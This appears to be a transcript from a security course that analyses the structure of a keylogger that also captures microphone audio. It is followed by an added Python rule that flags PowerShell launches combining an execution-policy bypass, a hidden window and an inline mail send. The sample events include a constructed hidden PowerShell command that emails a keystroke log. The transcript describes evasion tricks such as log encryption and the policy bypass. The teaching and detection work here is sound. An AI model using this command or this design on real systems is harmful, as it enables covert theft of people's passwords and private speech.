A keylogger is malicious software commonly used in malware, spyware, or as part of a virus. A keylogger records every single keystroke, meaning every button you press on your keyboard is logged and then sent to a remote attacker. This means they get all of your usernames, your passwords, and even the answers to your secret security questions, like your mother's maiden name, which you can't change. Advanced keyloggers can even
This video shows the audio-capturing capabilities of a keylogger.
- [Instructor] Now that we have seen this keylogger in action, let's look at the structure of this particular one. Keep in mind that malware is constantly changing, and just like regular software, the structure of malware is entirely up to its authors. However, the end goal is always the same, which is extracting as much information as possible from the target machine, which in this case is you. There are six objects that make up this keylogger. It has a modular design, so more features can be easily added.
Let's go over each one. The DateTime object is a utility. Its purpose is to save the log files with the current date and time the recording started so the hacker knows when you were online. It's used mainly by the logger class. The next component in this keylogger is the encrypter, which encrypts all the keystrokes the victim has typed before writing the key recordings to the .log file. This is done in case the user somehow stumbles upon the log file. It won't be obvious they are being recorded.
The encrypter is used by the logger class when a log file write has been triggered. The Keys class is the object that holds a list of all virtual key possibilities on a gaming keyboard based on their hardware interrupt code and maps them to a human-readable format. Now for the logger object, which is the component that handles all of the log file creation operations, from directory creation to writing encrypted keystrokes with the encrypter object and DateTime object.
Now for the email sending component. There are two objects that handle auto-email sending. The first is the MailSender object, which handles everything needed to send an email containing the recordings. This includes the PowerShell script creation, which is used to send the email. This PowerShell script has an option which enables the keylogger to bypass admin privileges that are normally required. Google "Powershell -execution policy bypass" for more information.
The second email component is the MailTimer object. The MailTimer object is a thread which handles asynchronous execution repeatedly for a set number of times. It takes in a task to be repeated and executed on a separate thread. This is required in order to record both keystrokes and the microphone audio stream at the same time. Now the core, the meat of this keylogger, is the part where it hooks into the Windows system message pump and installs a subroutine that monitors and processes all message traffic for keyboard presses before they reach their original intended target.
Now for the record audio task. This record audio task is the add-on which now allows this keylogger to record anything said over your microphone, whether it's your laptop's integrated microphone or a USB headset. The end-point audio device writes to the audio stream. This is why the recorded wav files have nothing but static noise at certain points, because the audio stream contained no data with voices. The keylogger does not manipulate this audio stream in any way. It simply reads from the buffer that the microphone device writes to.
We discuss this add-on in much more detail when we look at the source code in the next video.
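The transcript describes one observable launch pattern a defender can look for: the MailSender component runs a PowerShell script with the execution policy bypassed to mail the recordings out. The following is an added detection example, not code from the course or from the keylogger it analyses. It triages constructed process-creation events written in a simplified Sysmon Event ID 1 style (Image, ParentImage, CommandLine are real Sysmon field names; the event lines, the scoring weights and the severity thresholds are my own assumptions) and flags PowerShell launches that combine an execution-policy bypass with a hidden window, an inline mail-sending command, or a parent process living in a user-writable directory.

```python
"""Triage PowerShell process-creation events for the launch pattern the
transcript describes: a script run with the execution policy bypassed so
that recorded data can be sent out by email.

Added example; the events below are constructed, not real telemetry."""
import re

# Constructed sample events. Field names mirror Sysmon Event ID 1 (process
# creation); the paths and command lines are invented for the example.
SAMPLE_EVENTS = [
    # Administrative script run by the service host: bypass alone, otherwise plain.
    "UtcTime=2024-01-01 10:00:00 "
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "ParentImage=C:\\Windows\\System32\\svchost.exe "
    "CommandLine=powershell.exe -ExecutionPolicy Bypass -File C:\\ProgramData\\IT\\inventory.ps1",
    # The pattern from the transcript: hidden, bypassed, mailing a log file,
    # launched by an unknown binary in the user's profile.
    "UtcTime=2024-01-01 10:05:00 "
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "ParentImage=C:\\Users\\victim\\AppData\\Roaming\\svc.exe "
    "CommandLine=powershell.exe -ep bypass -w hidden -Command \"Send-MailMessage "
    "-From a@example.test -To b@example.test "
    "-Attachments C:\\Users\\victim\\AppData\\Roaming\\20240101_1000.log\"",
    # Ordinary interactive use.
    "UtcTime=2024-01-01 10:07:00 "
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "ParentImage=C:\\Windows\\explorer.exe "
    "CommandLine=powershell.exe -NoProfile -Command Get-Date",
    # Not PowerShell at all; ignored by the rule.
    "UtcTime=2024-01-01 10:09:00 Image=C:\\Windows\\System32\\notepad.exe "
    "ParentImage=C:\\Windows\\explorer.exe CommandLine=notepad.exe notes.txt",
]

FIELDS = ("UtcTime", "Image", "ParentImage", "CommandLine")
# Each value runs until the next known "Key=" token or end of line, so a
# CommandLine containing spaces is captured whole.
FIELD_RE = re.compile(
    r"(UtcTime|Image|ParentImage|CommandLine)=(.*?)"
    r"(?=\s+(?:UtcTime|Image|ParentImage|CommandLine)=|$)"
)

# powershell.exe accepts any unambiguous prefix of a parameter name, so the
# patterns cover the common short forms as well as the full spelling.
EXEC_BYPASS = re.compile(r"(?<![\w-])-(?:ExecutionPolicy|exec|ex|ep)\s+bypass\b", re.I)
HIDDEN_WINDOW = re.compile(r"(?<![\w-])-(?:WindowStyle|window|win|wi|w)\s+hidden\b", re.I)
# Only visible when the script body is passed inline with -Command; a -File
# launch needs script block logging (Event ID 4104) to see the cmdlet.
MAIL_SEND = re.compile(r"Send-MailMessage|Net\.Mail\.SmtpClient", re.I)
USER_WRITABLE_PARENT = re.compile(r"\\users\\[^\\]+\\appdata\\|\\temp\\", re.I)

# Assumed weights: the bypass and the mail send are the strongest signals.
WEIGHTS = {
    "execution-policy-bypass": 2,
    "hidden-window": 1,
    "mail-send": 2,
    "parent-in-user-writable-dir": 1,
}


def parse_event(line):
    """Split one Key=Value event line into a dict of the known fields."""
    return {key: value.strip() for key, value in FIELD_RE.findall(line)}


def score_event(event):
    """Return (severity, indicators) for one parsed event."""
    image = event.get("Image", "").lower()
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return "none", []
    cmd = event.get("CommandLine", "")
    parent = event.get("ParentImage", "")
    indicators = []
    if EXEC_BYPASS.search(cmd):
        indicators.append("execution-policy-bypass")
    if HIDDEN_WINDOW.search(cmd):
        indicators.append("hidden-window")
    if MAIL_SEND.search(cmd):
        indicators.append("mail-send")
    if USER_WRITABLE_PARENT.search(parent):
        indicators.append("parent-in-user-writable-dir")
    total = sum(WEIGHTS[i] for i in indicators)
    if total >= 4:
        severity = "high"
    elif total >= 2:
        severity = "medium"
    elif total > 0:
        severity = "low"
    else:
        severity = "none"
    return severity, indicators


def triage(lines):
    """Parse and score every event; returns one result dict per input line."""
    results = []
    for line in lines:
        event = parse_event(line)
        severity, indicators = score_event(event)
        results.append({"time": event.get("UtcTime", ""), "severity": severity,
                        "indicators": indicators, "command": event.get("CommandLine", "")})
    return results


if __name__ == "__main__":
    for result in triage(SAMPLE_EVENTS):
        if result["severity"] != "none":
            print(result["time"], result["severity"], ", ".join(result["indicators"]))
```

The first event scores only "medium": an execution-policy bypass on its own is common in legitimate administration, which is why the rule weighs it together with the hidden window, the mail-sending cmdlet and the unusual parent before calling a launch "high". Because the mail indicator depends on the script body being visible on the command line, a real deployment would pair this with PowerShell script block logging so that scripts launched with -File are inspected too.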
- Installing the Windows Performance Toolkit
- Reviewing keylogger source code
- Setting up a private call environment
- Gathering keylogger evidence
- Spyware audio usage analysis
- Spyware removal
- Microphone recording prevention tips